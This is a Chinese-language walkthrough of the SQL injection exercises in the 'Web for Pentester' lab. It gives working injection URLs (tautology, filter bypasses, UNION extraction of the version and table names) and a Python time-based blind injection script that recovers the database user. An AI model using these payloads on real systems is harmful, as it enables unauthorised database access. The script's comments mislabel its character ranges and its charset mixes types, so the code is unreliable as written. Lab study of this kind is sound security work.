web for pentester sqli
日期:2020-09-12
- example1
name=root 肯定是字符型注入 先闭合root 然后万能密码即可
http://192.168.239.134/sqli/example1.php?name=root' or '1'='1
- example2
这一题提示禁止使用空格,所以第一时间想到用**\替代 但是发现也过滤了/ 所以可以使用|| 替代or 这样可以避免空格
http://192.168.239.134/sqli/example2.php?name=root'||'1'='1
- example3
这一题使用上面的解题方法一样可以注入
http://192.168.239.134/sqli/example3.php?name=root'||'1'='1
- example4
这一题是数字型注入 使用上面的解法去掉'即可
http://192.168.239.134/sqli/example4.php?id=1||1=1
- example5
第五题一样 使用上面的答案可以成功注入,应该是比较通用的解法
http://192.168.239.134/sqli/example5.php?id=1||1=1
- example6
遍历出列数
http://192.168.239.134/sqli/example6.php?id=1 order by 5
验证列数
http://192.168.239.134/sqli/example6.php?id=1 union select 1,2,3,4,5
版本信息
http://192.168.239.134/sqli/example6.php?id=1 union select 1,version(),4,3,5
表信息 这里的参数必须要以数字型结束
http://192.168.239.134/sqli/example6.php?id=1 union select 1,table_name,4,3,5 from information_schema.TABLES where 1=1
- example7
这一题是单行匹配所以用%0A换行然后注入
example7.php?id=2%0AOrder%20by%206
使用上面的语句判断列数=6
example7.php?id=2%0Aunion%20select%201,2,3,4,5
- example8
通过order字段猜测可能是尾部拼接
http://192.168.239.135/sqli/example8.php?order=id`%20desc--+
验证了猜想正确 因为无法通过显示返回想要的信息 所以只能通过时间盲注
下面是猜解脚本
import requests
"""
通用延迟注入模型
"""
lower_char = range(65,91) # 26 个小写
upper_char = range(97,123) # 26个大写
number = range(48,57) #数字
other = ["_",'.','@']
def get_char():
return list(lower_char)+list(upper_char)+list(other)+[ord(i) for i in other]
def httpReq(url,timeout=5):
try:
requests.get(url,timeout=timeout)
return False
except requests.exceptions.ReadTimeout:
return True
def get_length():
length = 1
while length<30:
url=f'''http://192.168.239.135/sqli/example8.php?order=id` And If(length(user())={length},sleep(11),1) --+'''
status = httpReq(url)
if status:
print(f"长度为:{length}")
return length
length+=1
print("未能解析出长度")
# get_length()
def dismantling(length):
default=["*"]*length
for index in range(0,length+1):
for ch in get_char():
url=f'''http://192.168.239.135/sqli/example8.php?order=id` And If(ascii(SUBSTRING(user(),{index+1},1))={ch},sleep(11),1) --+'''
print(url)
status = httpReq(url)
if status:
default[index] = chr(ch)
print(default)
break
print(default)
print(f"dismantling:{default}")
dismantling(get_length())
output:
dismantling:['p', 'e', 'n', 't', 'e', 's', 't', 'e', 'r', 'l', 'a', 'b', '@', 'l', 'o', 'c', 'a', 'l', 'h', 'o', 's', 't']
- example9
和第八题一样也是可以延迟注入的(这里并没有对传入的值使用`包裹起来,可以不用考虑闭合问题)
payload
http://192.168.239.135/sqli/example9.php?order=name%20and(%20select(sleep(5)))
利用脚本
import requests
"""
通用延迟注入模型
"""
lower_char = range(65,91) # 26 个小写
upper_char = range(97,123) # 26个大写
number = range(48,57) #数字
other = ["_",'.','@']
def get_char():
return list(lower_char)+list(upper_char)+list(other)+[ord(i) for i in other]
def httpReq(url,timeout=5):
try:
requests.get(url,timeout=timeout)
return False
except requests.exceptions.ReadTimeout:
return True
def get_length():
length = 1
while length<30:
url=f'''http://192.168.239.135/sqli/example9.php?order=id And If(length(user())={length},sleep(11),1) --+'''
status = httpReq(url)
if status:
print(f"长度为:{length}")
return length
length+=1
print("未能解析出长度")
# get_length()
def dismantling(length):
default=["*"]*length
for index in range(0,length+1):
for ch in get_char():
url=f'''http://192.168.239.135/sqli/example9.php?order=id And If(ascii(SUBSTRING(user(),{index+1},1))={ch},sleep(11),1) --+'''
print(url)
status = httpReq(url)
if status:
default[index] = chr(ch)
print(default)
break
print(default)
print(f"dismantling:{default}")
length=get_length()
dismantling(length)